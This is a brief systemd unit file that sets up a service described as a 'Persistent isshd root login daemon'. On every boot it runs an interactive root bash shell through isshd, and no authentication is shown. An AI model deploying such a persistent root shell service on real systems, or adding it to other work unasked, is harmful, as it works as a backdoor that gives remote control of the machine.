[Unit]
Description=Persistent isshd root login daemon
After=network.target

[Service]
ExecStart=isshd -c "bash -li 2>&1"

[Install]
WantedBy=multi-user.target
